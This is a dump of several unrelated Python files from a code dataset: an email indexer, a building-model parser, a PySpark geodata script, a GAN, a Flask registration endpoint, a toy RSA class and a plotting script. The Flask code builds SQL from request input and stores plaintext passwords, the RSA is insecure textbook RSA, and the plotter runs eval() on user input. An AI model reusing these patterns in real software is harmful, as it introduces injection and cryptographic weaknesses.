self.__cacheshlv = {}\n try:\n self.__vectorshlv = pickle.load(vectorshlv)\n except EOFError:\n self.__vectorshlv = {} \n \n glossshlv.close()\n subjshlv.close()\n fromshlv.close()\n bodyshlv.close()\n seenshlv.close()\n cacheshlv.close()\n vectorshlv.close()\n \n def sync(self):\n glossshlv = open(self.GLOSSARY, \"w\")\n subjshlv = open(self.SUBJECT, \"w\")\n fromshlv = open(self.FROM, \"w\")\n bodyshlv = open(self.BODY, \"w\")\n seenshlv = open(self.SEEN, \"w\")\n cacheshlv = open(self.CACHE, \"w\")\n vectorshlv = open(self.TERMS_VECTORS , \"w\")\n \n pickle.dump(self.__glossshlv, glossshlv)\n pickle.dump(self.__subjshlv, subjshlv)\n pickle.dump(self.__fromshlv, fromshlv)\n pickle.dump(self.__bodyshlv, bodyshlv)\n pickle.dump(self.__seenshlv, seenshlv)\n pickle.dump(self.__cacheshlv, cacheshlv)\n pickle.dump(self.__vectorshlv, vectorshlv)\n \n glossshlv.close()\n subjshlv.close()\n fromshlv.close()\n bodyshlv.close()\n seenshlv.close()\n cacheshlv.close()\n vectorshlv.close()\n \n def __init__(self, toIndex, init=True):\n if init:\n #create files\n glossshlv = open(self.GLOSSARY, \"w\")\n subjshlv = open(self.SUBJECT, \"w\")\n fromshlv = open(self.FROM, \"w\")\n bodyshlv = open(self.BODY, \"w\")\n seenshlv = open(self.SEEN, \"w\")\n cacheshlv = 
open(self.CACHE, \"w\")\n vectorshlv = open(self.TERMS_VECTORS, \"w\")\n \n glossshlv.close()\n subjshlv.close()\n fromshlv.close()\n bodyshlv.close()\n seenshlv.close()\n cacheshlv.close()\n vectorshlv.close()\n #init the dictionaries\n self.load()\n\n #index mails\n self.__seenshlv = []\n helper = {}\n for mail in toIndex:\n print(\"Indexing \" + mail.id)\n helper[mail.id] = [-1, -1 , -1]\n \n self.__cacheshlv[mail.id] = [mail.sender, mail.time,mail.subject, mail.message]\n \n self.__seenshlv.append(mail.id)\n #index sender\n tmp = tokenizer.Tokenize(mail.sender)\n helper[mail.id][0]=tmp.__len__()\n code = 0\n for token in tmp:\n if not token in self.__glossshlv:\n code = self.generateCode()\n self.__glossshlv[token] = code\n self.__fromshlv[code] = [mail.id]\n else:\n code = self.__glossshlv[token]\n if not code in self.__fromshlv:\n self.__fromshlv[code] = [mail.id]\n else:\n self.__fromshlv[code].append(mail.id) \n #index subject\n tmp = tokenizer.Tokenize(mail.subject)\n helper[mail.id][1]=tmp.__len__()\n code = 0\n for token in tmp:\n if not token in self.__glossshlv:\n code = self.generateCode()\n self.__glossshlv[token] = code\n self.__subjshlv[code] = [mail.id]\n else:\n code = self.__glossshlv[token]\n if not code in self.__subjshlv:\n self.__subjshlv[code] = [mail.id]\n else:\n self.__subjshlv[code].append(mail.id)\n #index message\n tmp = tokenizer.Tokenize(mail.message)\n helper[mail.id][2]=tmp.__len__()\n code = 0\n for token in tmp:\n if not token in self.__glossshlv:\n code = self.generateCode()\n self.__glossshlv[token] = code\n self.__bodyshlv[code] = [mail.id]\n else:\n code = self.__glossshlv[token]\n if not code in self.__bodyshlv:\n self.__bodyshlv[code] = [mail.id]\n else:\n self.__bodyshlv[code].append(mail.id)\n \n \n for mail in toIndex:\n print(\"calculating \" + mail.id)\n vect = [{}, {}, {}]\n for term in self.__glossshlv:\n code = self.__glossshlv[term]\n for tuple in [(vect[0], self.__fromshlv, 0, 0), (vect[1], self.__subjshlv, 2, 1), (vect[2], self.__bodyshlv, 3, 2)]:\n dict = tuple[1]\n part_content = self.__cacheshlv[mail.id][tuple[2]]\n if dict.has_key(code):\n number_of_term_in_part = float(dict[code].count(mail.id))\n \n number_of_terms_in_part = float(helper[mail.id][tuple[3]])\n \n number_of_parts = float(self.__cacheshlv.__len__())\n number_of_parts_with_term = float(dict[code].__len__())\n \n tf_idf_value = utils.tf_idf(number_of_term_in_part, number_of_terms_in_part, number_of_parts_with_term, number_of_parts)\n \n if tf_idf_value != 0:\n tuple[0][code] = tf_idf_value\n \n else:\n #nothing to do here\n pass\n \n \n \n self.__vectorshlv[mail.id] = vect\n self.__glossshlv[self.GENCODELBL] = self.GENCODE\n \n #close the dictionaries\n self.sync()\n\n def update_by_date(self, toIndex):\n self.__init__(toIndex, init=False)\n \n def full_update(self, toIndex):\n self.__init__(toIndex)\n\n def generateCode(self):\n self.GENCODE = self.GENCODE + 1\n return self.GENCODE\n \ndef main():\n pass\n \nif __name__==\"__main__\":\n main()\n","sub_path":"services/indexer.py","file_name":"indexer.py","file_ext":"py","file_size_in_byte":7469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"134226806","text":"from .sbem_model import *\nimport re\nfrom .sbem_hvac_system import *\nfrom .sbem_general import *\nfrom .sbem_compliance import *\nfrom .sbem_construction import *\nfrom .sbem_dhw_generator import *\n# from .sbem_glass import *\nclass SbemInpModel(SbemModel): \n OBJECT_MATCH_REGEX = 
re.compile(\"^\\s*\\\"([^\\\"]+)\\\"\\s*=\\s*([A-Z\\-]+)([\\s\\S]*?)(?=\\.\\.(?=[\\n\\r\\s]+))\", re.MULTILINE)\n    OBJECT_PROPERTY_REGEX = re.compile(\"^\\s*([0-9A-Z\\-]+)\\s*=\\s*(.+)\\s*$\", re.MULTILINE)\n    def __init__(self, text):\n        self.classifiedObjects = {SbemObject:[],\n                              SbemHvacSystem:[],\n                              SbemZone:[],\n                              SbemWall:[],\n                              SbemWindow:[],\n                              SbemDhwGenerator:[],\n                              SbemGlass:[],\n                              SbemConstruction:[],\n                              SbemDoor:[]}\n        \n        self.objects = SbemObjectSet()\n        self.dhws = SbemObjectSet()\n        self.hvacs = SbemObjectSet()\n        self.glasses = SbemObjectSet()\n        self.constructions = SbemObjectSet()\n        self.epcObject = None\n        js = {\"hvacs\":[], \"constructions\":[], \"glasses\":[], \"dhws\":[]}\n        curHvac = False\n        curZone = False\n        curWall = False\n        \n        hvacs = []\n        isNumber = re.compile(\"^-?\\d+\\.?\\d*$\")\n        for match in self.OBJECT_MATCH_REGEX.findall(text):\n            # Fix issue whereby \n            \n            obj = {\"name\":match[0],\"props\":{}}\n            for prop in self.OBJECT_PROPERTY_REGEX.findall(match[2]):\n                obj[\"props\"][prop[0]] = prop[1] if not isNumber.match(prop[1]) else float(prop[1])\n            obj[\"area\"] = obj[\"props\"][\"AREA\"] if \"AREA\" in obj[\"props\"] else 0\n            if match[1] == \"GENERAL\":\n                self.general = SbemGeneral(self,obj)\n                js[\"general\"] = obj\n            elif match[1] == \"CONSTRUCTION\":\n                con = SbemConstruction(self,obj)\n                self.constructions.append(con)\n                self.classifiedObjects[SbemConstruction].append(con)\n                js[\"constructions\"].append(obj)\n            elif match[1] == \"GLASS\":\n                glass = SbemGlass(self,obj)\n                self.glasses.append(glass)\n                self.classifiedObjects[SbemGlass].append(glass)\n                js[\"glasses\"].append(obj)\n            elif match[1] == \"COMPLIANCE\":\n                self.compliance = SbemCompliance(self,obj)\n                js[\"compliance\"] = obj\n            elif match[1] == \"DHW-GENERATOR\":\n                if not self.dhws:\n                    self.dhws = SbemObjectSet()\n                dhw = SbemDhwGenerator(self, obj)\n                self.dhws.append(dhw)\n                self.objects.append(dhw)\n                js[\"dhws\"].append(obj)\n            elif match[1] == \"HVAC-SYSTEM\":\n                curHvac = obj\n                curHvac[\"zones\"] = []\n                hvacs.append(curHvac)\n                js[\"hvacs\"].append(curHvac)\n            elif match[1] == \"ZONE\":\n                curZone = obj\n                curHvac[\"zones\"].append(curZone)\n                curZone[\"walls\"] = []\n            elif match[1] == \"WALL\":\n                curWall = obj\n                curZone[\"walls\"].append(curWall)\n                curWall[\"windows\"] = []\n                curWall[\"doors\"] = []\n            elif match[1] == \"WINDOW\":\n                curWall[\"windows\"].append(obj)\n            elif match[1] == \"DOOR\":\n                curWall[\"doors\"].append(obj)\n            else:\n                obj = SbemObject(self, obj)\n                self.objects.append(obj)\n                self.classifiedObjects[SbemObject].append(obj)\n        super(self.__class__,self).__init__(js)\n\n    @classmethod \n    def extractSpecificObjectType(self,text, key, delegate=SbemObject):\n        pat = re.compile(\"^\\s*\\\"([^\\\"]+)\\\"\\s*=\\s*%s([A-Z\\-]+)([\\s\\S]*?)(?=\\.\\.)\" %(key))\n        output = SbemObjectSet()\n        for match in pat.findall(text):\n            props = {}\n            # use the class-level regex; the bare name previously raised a NameError here\n            for prop in self.OBJECT_PROPERTY_REGEX.findall(match[2]):\n                props[prop[0]] = prop[1]\n            output.append(delegate({\"name\": match[0], \"props\": props}))\n        return output\n    \n    \n    ","sub_path":"lib/sbem_model/sbem_inp_model.py","file_name":"sbem_inp_model.py","file_ext":"py","file_size_in_byte":4337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
{"seq_id":"127538614","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Mar 11 14:28:30 2020\n\n@author: oliviaroberts\n\"\"\"\nfrom pyspark.sql.functions import lit\nfrom pyspark.sql.functions import udf\nfrom pyspark.sql.functions import rand \nfrom pyspark.sql.types import FloatType\nfrom 
shapely.geometry import Point\nimport geopandas as gpd\n\n# Read csv\nuber_df = spark.read.csv(\"uber14.csv\", inferSchema = True, header = True)\nnyc = gpd.read_file('NYC_map/nyc.shp')\n\n# Change lat/long to float\nuber_df = uber_df.withColumn(\"Lat\", uber_df[\"Lat\"].cast(FloatType()))\nuber_df = uber_df.withColumn(\"Lon\", uber_df[\"Lon\"].cast(FloatType()))\n\n# Add columns: Burrow , Month\nuber_df = uber_df.withColumn('Burrow', lit(None))\nuber_df = uber_df.withColumn('Month', lit(None))\n\n# Take sample\nsample_uber_df = uber_df.select(\"*\").orderBy(rand()).limit(100000)\n\ndef burrow_column(X, Y):\n point = Point(Y, X)\n if nyc['geometry'][0].contains(point):\n return('Bronx')\n if nyc['geometry'][1].contains(point):\n return('Staten Island')\n if nyc['geometry'][2].contains(point):\n return('Brooklyn')\n if nyc['geometry'][3].contains(point):\n return('Queens')\n if nyc['geometry'][4].contains(point):\n return('Manhattan')\n\ndef month_column(X):\n if X[0] == '4':\n return(\"April\")\n if X[0] == '5':\n return(\"May\")\n if X[0] == '6':\n return(\"June\")\n if X[0] == '7':\n return(\"July\")\n if X[0] == '8':\n return(\"August\")\n if X[0] == '9':\n return(\"September\")\n\nfunc = udf(burrow_column)\nsample_uber_df = sample_uber_df.withColumn('Burrow', func(sample_uber_df['Lat'], sample_uber_df['Lon']))\n\nfunc = udf(month_column)\nsample_uber_df = sample_uber_df.withColumn('Month', func(sample_uber_df['Date/Time']))\n\n# Dropping nulls\nsample_uber_df = sample_uber_df.filter((sample_uber_df.Month != 'null'))\nsample_uber_df = sample_uber_df.filter((sample_uber_df.Burrow != 'null'))\n\n# Write to csv\nsample_uber_df.write.format(\"csv\").save('burrows.csv', header = 'true')\n\n\n\n#### Extras ####\nuber_df.createOrReplaceTempView(\"Uber\")\nnew_df = sqlContext.sql(\"select count(*) from Uber\")\nnew_df = uber_df.groupby(uber_df.Burrow).count()\nX = taxi_df.select(\"pickup_datetime\").collect()[0] \nY = uber_df.select(\"Lon\").collect()[0] \n","sub_path":"burrow.py","file_name":"burrow.py","file_ext":"py","file_size_in_byte":2275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"590201379","text":"import numpy as np\nimport os\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport torch\nimport torch.nn as nn\nimport torchvision\nimport torch.nn.functional as F\nfrom torchvision import datasets, transforms\nimport pickle\n\ntransform = transforms.Compose([transforms.Resize(64),\n transforms.CenterCrop(64),\n transforms.ToTensor()])\ndataset = torchvision.datasets.ImageFolder(\"drive/MyDrive/celeb_data\",\n transform=transform)\ndata_loader = torch.utils.data.DataLoader(dataset, \n batch_size=128, \n shuffle=True,\n num_workers=0)\n\nimages,_ = next(iter(data_loader))\n\nimg = torch.transpose(images[0], 0,1)\nimg = torch.transpose(img,1,2)\nplt.imshow(img)\n\nclass Discriminator(nn.Module):\n def __init__(self,num_channels,activation_slope=0.2):\n super(Discriminator,self).__init__()\n self.slope = activation_slope\n self.num_channels = num_channels\n self.conv1=nn.Conv2d(in_channels=3,\n out_channels=num_channels,\n kernel_size=3,\n stride=2,\n padding=1)\n self.conv2=nn.Conv2d(in_channels=num_channels,\n out_channels=num_channels*2,\n kernel_size=3,\n stride=2,\n padding=1)\n self.conv3=nn.Conv2d(in_channels=num_channels*2,\n out_channels=num_channels*4,\n kernel_size=3,\n stride=2,\n padding=1)\n self.conv4=nn.Conv2d(in_channels=num_channels*4,\n out_channels=num_channels*8,\n kernel_size=3,\n stride=2,\n 
padding=1)\n self.conv5=nn.Conv2d(in_channels=num_channels*8,\n out_channels=num_channels*16,\n kernel_size=3,\n stride=2,\n padding=1)\n\n self.dense = nn.Linear(num_channels*16*2*2,1)\n\n\n def forward(self,x):\n\n out=F.leaky_relu(self.conv1(x), self.slope)\n out=F.leaky_relu(self.conv2(out), self.slope)\n out=F.leaky_relu(self.conv3(out), self.slope)\n out=F.leaky_relu(self.conv4(out), self.slope)\n out=F.leaky_relu(self.conv5(out), self.slope) \n out = out.view(-1, self.num_channels*16*2*2)\n out = self.dense(out)\n return out\n\n#Define Discrimnator and test on random input\nD = Discriminator(num_channels=32)\nsample_output = D(images)\nsample_output.shape\n\nclass Generator(nn.Module):\n def __init__(self, num_channels, latent_dim):\n super(Generator, self).__init__()\n self.num_channels = num_channels\n self.latent_dim = latent_dim\n self.mapping = mapping\n\n self.up1 = nn.ConvTranspose2d(in_channels=self.num_channels*16,\n out_channels=num_channels*8,\n stride=2,\n padding=1,\n kernel_size=4)\n \n self.batch1 = nn.BatchNorm2d(num_channels*8)\n self.up2 = nn.ConvTranspose2d(in_channels=self.num_channels*8,\n out_channels=num_channels*4,\n stride=2,\n padding=1,\n kernel_size=4)\n \n self.batch2 = nn.BatchNorm2d(num_channels*4)\n self.up3 = nn.ConvTranspose2d(in_channels=num_channels*4,\n out_channels=num_channels*2,\n stride=2,\n kernel_size=4,\n padding=1)\n \n self.batch3 = nn.BatchNorm2d(num_channels*2)\n self.up4 = nn.ConvTranspose2d(in_channels=num_channels*2,\n out_channels=num_channels,\n stride=2,\n padding=1,\n kernel_size=4)\n \n self.batch4 = nn.BatchNorm2d(num_channels)\n self.up5 = nn.ConvTranspose2d(in_channels=num_channels,\n out_channels=3,\n stride=2,\n padding=1,\n kernel_size=4)\n \n self.dense = nn.Linear(256, self.num_channels*16*2*2)\n\n #Define the AdaIn layers for the mapping network\n self.W1 = nn.Linear(256, num_channels*8)\n self.B1 = nn.Linear(256, num_channels*8)\n\n self.W2 = nn.Linear(256, num_channels*4)\n self.B2 = nn.Linear(256, num_channels*4)\n\n self.W3 = nn.Linear(256, num_channels*2)\n self.B3 = nn.Linear(256, num_channels*2)\n\n self.W4 = nn.Linear(256, num_channels)\n self.B4 = nn.Linear(256, num_channels)\n\n\n \n def forward(self,x):\n out = self.dense(x)\n out = out.view(-1, self.num_channels*16,2,2)\n out = F.normalize(F.relu(self.batch1(self.up1(out))),dim=1)\n A_w = self.W1(x).view(-1,self.num_channels*8,1,1)\n A_b = self.B1(x).view(-1,self.num_channels*8,1,1)\n out = A_w*out + A_b\n out = F.normalize(F.relu(self.batch2(self.up2(out))))\n A_w = self.W2(x).view(-1,self.num_channels*4,1,1)\n A_b = self.B2(x).view(-1,self.num_channels*4,1,1)\n out = A_w*out + A_b\n out = F.normalize(F.relu(self.batch3(self.up3(out))))\n A_w = self.W3(x).view(-1,self.num_channels*2,1,1)\n A_b = self.B3(x).view(-1,self.num_channels*2,1,1)\n out = A_w*out + A_b\n out = F.normalize(F.relu(self.batch4(self.up4(out))))\n A_w = self.W4(x).view(-1,self.num_channels,1,1)\n A_b = self.B4(x).view(-1,self.num_channels,1,1)\n out = A_w*out + A_b\n out = torch.tanh(self.up5(out))\n return out\n\nclass MappingNetwork(nn.Module):\n def __init__(self, num_layers, latent_dim):\n super(MappingNetwork, self).__init__()\n self.num_layers = num_layers\n self.layers = []\n\n for i in range(self.num_layers):\n self.layers.append(nn.Linear(latent_dim, latent_dim))\n \n self.layers = nn.ModuleList(self.layers)\n \n def forward(self, x):\n for layer in self.layers:\n x = layer(x)\n return x\n\n#Define mapping network instance and test it out\nmapping = 
MappingNetwork(num_layers=4,latent_dim=256)\nnoise = torch.randn((32,256)).float()\nlatent_code = mapping(noise)\nlatent_code.shape\n\n# Defining generator and trying random input\nG = Generator(num_channels=32,latent_dim=256)\nlatent_code = torch.randn((128,256))\ngenerated_img = G(mapping(latent_code))\ngenerated_img.shape\n\n\n\nif torch.cuda.is_available():\n print(\"CUDA Availaible\")\n D.cuda()\n G.cuda()\n mapping.cuda()\n\n#Hyperparameters\nadam_beta = (0.5,0.999)\nadam_lr = 2e-4\n\ndef D_loss(real,fake,scale=0.95):\n real_batch_size = real.size(0)\n fake_batch_size = fake.size(0)\n \n ones = torch.ones(real_batch_size) * scale\n zeros = torch.zeros(fake_batch_size)\n\n if torch.cuda.is_available():\n ones = ones.cuda()\n zeros = zeros.cuda()\n criterion = nn.BCEWithLogitsLoss()\n real_loss = criterion(real.squeeze(),ones)\n fake_loss = criterion(fake.squeeze(),zeros)\n return real_loss + fake_loss\n\ndef G_loss(fake):\n batch_size = fake.size(0)\n ones = torch.ones(batch_size)\n\n if torch.cuda.is_available():\n ones = ones.cuda()\n \n criterion=nn.BCEWithLogitsLoss()\n loss = criterion(fake.squeeze(),ones)\n return loss \n \n#Defining Adam Optimizers\n\nd_optimizer = torch.optim.Adam(D.parameters(),lr=adam_lr,betas=adam_beta)\ng_params = list(G.parameters()) + list(mapping.parameters())\ng_optimizer = torch.optim.Adam(g_params,lr=adam_lr,betas=adam_beta)\n\ndef train(num_epochs):\n \n if torch.cuda.is_available():\n D.cuda()\n G.cuda()\n mapping.cuda()\n\n samples = []\n losses = []\n\n sample_size = 9\n sample_noise = torch.randn((sample_size, 256)).float()\n \n if torch.cuda.is_available():\n sample_noise = sample_noise.cuda()\n\n for epoch in range(num_epochs):\n\n for batch_i, (images, _) in enumerate(data_loader):\n print(\"EPOCH : \",epoch, \"BATCH : \", batch_i)\n batch_size = images.size(0)\n if batch_size != 128:\n continue\n images = images*2.0 - 1.0\n d_optimizer.zero_grad()\n \n if torch.cuda.is_available():\n images = images.cuda()\n \n D_real = D(images)\n\n z = torch.randn((batch_size, 256)).float()\n if torch.cuda.is_available():\n z = z.cuda()\n\n D_fake = D(G(mapping(z)))\n \n d_loss = D_loss(D_real, D_fake)\n d_loss.backward()\n d_optimizer.step()\n\n g_optimizer.zero_grad()\n\n z = torch.randn((batch_size, 256)).float()\n if torch.cuda.is_available():\n z = z.cuda()\n \n D_fake = D(G(mapping(z)))\n g_loss = G_loss(D_fake)\n\n g_loss.backward()\n g_optimizer.step()\n\n if batch_i % 250 == 0:\n\n curr_stats = {\"d_loss\": d_loss.item(), \"g_loss\": g_loss.item()}\n losses.append(curr_stats)\n print('Epoch : {} d_loss: {} g_loss: {}'.format(\n epoch, d_loss.item(), g_loss.item()))\n\n\n G.eval() \n sample_imgs = G(mapping(sample_noise))\n samples.append(sample_imgs)\n G.train()\n\n plot_images(sample_imgs) \n\n with open('samples.pkl', 'wb') as f:\n pickle.dump(samples, f)\n \n torch.save(D.state_dict(), \"discriminator.weights\")\n torch.save(G.state_dict(), \"generator.weights\")\n\n return losses\n\ndef plot_images(images):\n fig, axes = plt.subplots(figsize=(9,9), nrows=3, ncols=3, sharey=True, sharex=True)\n for ax, img in zip(axes.flatten(), images):\n img = img.detach().cpu().numpy()\n img = np.transpose(img, (1, 2, 0))\n img = ((img +1)*255 / (2)).astype(np.uint8) # rescale to pixel range (0-255)\n ax.xaxis.set_visible(False)\n ax.yaxis.set_visible(False)\n im = ax.imshow(img.reshape((64,64,3)))\n plt.show()\n\nlosses = 
train(num_epochs=50)\n\n","sub_path":"models/ganwmapping.py","file_name":"ganwmapping.py","file_ext":"py","file_size_in_byte":10322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"503866182","text":"from flask_restful import Resource, reqparse\r\nfrom db import query\r\nfrom flask_jwt_extended import create_access_token, jwt_required\r\nfrom werkzeug.security import safe_str_cmp\r\nimport pymysql\r\n\r\n# this parameter is given globally in this module so that the userdb is changed all over the module if \r\n# changed at one place (here). userdb is set so that while testing locally, \r\n# the local database could have userdb different from 'User'. \r\n# In the database employed for this utility, userdb is 'User'\r\nuserdb = 'User'\r\n\r\n# this resource is defined for the user to register\r\nclass UserRegister(Resource):\r\n\r\n def post(self):\r\n parser = reqparse.RequestParser()\r\n parser.add_argument('uname', type=str, required=True, help=\"uname cannot be left blank!\")\r\n parser.add_argument('password', type=str, required=True, help=\"password cannot be left blank!\")\r\n parser.add_argument('rno', type=str, required=True, help=\"rno cannot be left blank!\")\r\n parser.add_argument('branch_name', type=str, required=True, help=\"branch_name cannot be left blank!\")\r\n parser.add_argument('sem_no', type=str, required=True, help=\"sem_no cannot be left blank!\")\r\n data = parser.parse_args()\r\n \r\n try:\r\n qstr = f\"\"\" \r\n SELECT uname from users where uname = \"{ data['uname'] }\";\r\n \"\"\"\r\n usersWithUname = query(qstr, return_json=False, connect_db=userdb)\r\n \r\n qstr = f\"\"\" \r\n SELECT uname from users where rno = \"{ data['rno'] }\";\r\n \"\"\"\r\n usersWithRoll = query(qstr, return_json=False, connect_db=userdb)\r\n \r\n except Exception as e:\r\n return {\r\n \"message\" : \"There was an error connecting to the Users table while checking for an existing user.\" + str(e)\r\n }, 500\r\n\r\n if len(usersWithUname)>0:\r\n return {\r\n \"message\" : \"A user with the same username exists.\"\r\n }, 400\r\n\r\n if len(usersWithRoll)>0:\r\n return {\r\n \"message\" : \"A user with the same roll number exists.\"\r\n }, 400\r\n\r\n\r\n qstr = f\"\"\" INSERT INTO users values(\"{ data['uname'] }\", \r\n \"{ data['password'] }\", \r\n \"{ data['rno'] }\", \r\n \"{ data['branch_name'] }\", \r\n \"{ data['sem_no'] }\" ); \"\"\"\r\n\r\n try:\r\n query(qstr, connect_db=userdb)\r\n # except (pymysql.err.InternalError, pymysql.err.ProgrammingError, pymysql.err.IntegrityError) as e:\r\n # return {\r\n # \"message\" : \"MySQL error: \" + str(e)\r\n # }, 500\r\n # except Exception as e:\r\n # return {\r\n # \"message\" : \"Cannot create a user.\" + str(e)\r\n # }, 500\r\n except:\r\n return {\r\n \"message\" : \"Cannot create the user.\"\r\n }, 500\r\n \r\n return {\r\n \"message\" : \"Succesfully registered.\"\r\n }, 200","sub_path":"api/qp-api-flask/resources/user_register.py","file_name":"user_register.py","file_ext":"py","file_size_in_byte":2986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"23271145","text":"import random\n\n\n\nclass Rsa:\n BIT_SIZE = 1024\n def __init__(self):\n self.firstPrime = 0\n self.secondPrime = 0\n self.publicKey = 0\n self.privateKey = 0\n self.modulus = 1\n\n def initialize(self):\n \n with open(\"rsaEncryption.rsa\",'r') as file:\n if file.read() == '':\n self.generateKeys()\n else:\n file.seek(0)\n self.firstPrime = 
int(file.readline())\n self.secondPrime = int(file.readline())\n\n self.modulus = self.firstPrime * self.secondPrime\n\n phi = (self.firstPrime-1) * (self.secondPrime-1)\n\n for number in range(phi,1,-1):\n if self.gcd(phi,number) == 1:\n self.publicKey = number\n break\n \n for number in range(phi,1,-1):\n if (self.publicKey * number) % phi == 1:\n self.privateKey = number\n break\n\n def generateKeys(self):\n self.firstPrime = self.generatePrime()\n self.secondPrime = self.generatePrime()\n \n with open(\"rsaEncryption.rsa\",'w') as file:\n file.write(str(self.firstPrime)+'\\n')\n file.write(str(self.secondPrime))\n\n self.initialize()\n\n def encrypt(self,message):\n ascii_values = []\n char_sequence = []\n\n for index,char in enumerate(message):\n if not (ord(char) in ascii_values):\n ascii_values.append(ord(char))\n char_sequence.append(ascii_values.index(ord(char)))\n \n print('\\n')\n\n cipherNumList = []\n j = 3\n for index,ascii in enumerate(ascii_values):\n if index % 10 == 0:\n j-=1\n backSpace = '\\b'\n if j < 0:\n j = 2\n \n completed = 100 * index/len(ascii_values)\n print('\\tEncrypting...'+backSpace*j,' ','\\tProgress ->',\"{0:.2f}\".format(completed),'%',end = '\\r')\n cipherNumList.append(pow(ascii,self.publicKey,self.modulus))\n \n print('****************** Done!...Data Encrypted! *********************')\n return str(cipherNumList)+'\\n'+str(char_sequence)\n\n def decrypt(self,formattedCipherText):\n formattedCipherText = formattedCipherText.replace(']','',2)\n formattedCipherText = formattedCipherText.replace('[','',2)\n\n end = formattedCipherText.find('\\n')\n cipherNumList = formattedCipherText [:end]\n charSequence = formattedCipherText[end+1:]\n\n cipherNumList = list(cipherNumList.split(','))\n cipherNumList = list(map(int,cipherNumList))\n\n charSequence = list(charSequence.split(','))\n charSequence = list(map(int,charSequence))\n \n decryptedAscii_list = []\n\n print('\\n')\n j = 3\n for index,ascii in enumerate(cipherNumList):\n if index % 10 == 0:\n j-=1\n backSpace = '\\b'\n if j < 0:\n j = 2\n completed = 100 * index/len(cipherNumList)\n print('\\tDecrypting...'+backSpace*j,' ','\\tProgress ->',\"{0:.2f}\".format(completed),'%', end = '\\r')\n decryptedAscii_list.append(pow(ascii,self.privateKey,self.modulus))\n\n #print('****************** Done!...Data Decrypted! 
*********************')\n actualText = ''\n for asciiValue in charSequence:\n actualText += chr(decryptedAscii_list[asciiValue])\n\n return actualText\n\n def fermat_primality_test(self,number):\n\n if number % 2 == 0:\n return False\n\n evenComponent=number-1\n a=random.randrange(1,number)\n if pow(a,evenComponent,number) == 1:\n return True\n return False\n \n \n def generatePrime(self):\n while True:\n primeCandidate = random.randrange(pow(2,Rsa.BIT_SIZE),pow(2,Rsa.BIT_SIZE+1))\n if self.fermat_primality_test(primeCandidate):\n return primeCandidate\n \n def gcd(self,a,b):\n if b == 0:\n return a\n else:\n return self.gcd(b,a%b)\n","sub_path":"Rsa.py","file_name":"Rsa.py","file_ext":"py","file_size_in_byte":3609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"282771","text":"\n\nimport math\n\nfun_str = input(\"Please input a function: \")\nx_max = float(input(\"Please input x-max: \"))\nx_min = float(input(\"Please input x-min: \"))\nns = int(input(\"Please input the number of points you'd like to graph: \"))\nxs=[]\nys=[]\ni= x_min\nevenly_divided = (x_max-x_min)/ns\nj = 0\nwhile i <= x_max + 1:\n xs.append(i)\n i+=evenly_divided\n print(xs[j], \" \")\n j+=1\n \nfor x in xs:\n y = eval(fun_str)\n ys.append(y)\n\nfirst_line = '{0:<12s} | {1:<12s}'.format('x','y')\nprint(first_line)\nprint('-'*27)\n\nfor i in range(ns+1):\n print('{0:>+12.4f} | {1:>+12.4f}'.format(xs[i],ys[i]))\n #print(xs[i])\n #print(ys[i])'''\n \n\n\n\n'''plot(xs, ys, marker='o', linestyle='-')\nxlabel('x')\nylabel('y')\ntitle(fun_str)\nshow()'''\n","sub_path":"func_vis.py","file_name":"func_vis.py","file_ext":"py","file_size_in_byte":740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"640619527","text":"import streamlit as st\nimport TEIEntityEnricher.Utils.tei_parser as tp\nimport TEIEntityEnricher.Menu.menu_ner_task_def as ner_task\nimport json\nimport os\n\n\nclass Menu_ner_tei_map():\n def __init__(self, state, show_menu=True):\n self.state = state\n\n self.tnm_Folder = 'TNM'\n self.template_tnm_Folder = os.path.join('TEIEntityEnricher', 'Templates', self.tnm_Folder)\n self.tnm_attr_name = 'name'\n self.tnm_attr_ntd = 'ntd'\n self.tnm_attr_template = 'template'\n self.tnm_mode_add = 'add'\n self.tnm_mode_dupl = 'duplicate'\n self.tnm_mode_edit = 'edit'\n\n if not os.path.isdir(self.tnm_Folder):\n os.mkdir(self.tnm_Folder)\n if not os.path.isdir(self.template_tnm_Folder):\n os.mkdir(self.template_tnm_Folder)\n\n self.mappingslist = []\n for mappingFile in sorted(os.listdir(self.template_tnm_Folder)):\n if mappingFile.endswith('json'):\n with open(os.path.join(self.template_tnm_Folder, mappingFile)) as f:\n self.mappingslist.append(json.load(f))\n for mappingFile in sorted(os.listdir(self.tnm_Folder)):\n if mappingFile.endswith('json'):\n with open(os.path.join(self.tnm_Folder, mappingFile)) as f:\n self.mappingslist.append(json.load(f))\n\n self.mappingdict = {}\n self.editable_mapping_names = []\n for mapping in self.mappingslist:\n self.mappingdict[mapping[self.tnm_attr_name]] = mapping\n if not mapping[self.tnm_attr_template]:\n self.editable_mapping_names.append(mapping[self.tnm_attr_name])\n\n if show_menu:\n self.ntd = ner_task.Menu_ner_task_def(state, show_menu=False)\n self.show()\n\n def validate_and_saving_mapping(self, mapping, mode):\n val = True\n if self.tnm_attr_name not in mapping.keys() or mapping[self.tnm_attr_name] is None or mapping[\n self.tnm_attr_name] == '':\n val = False\n 
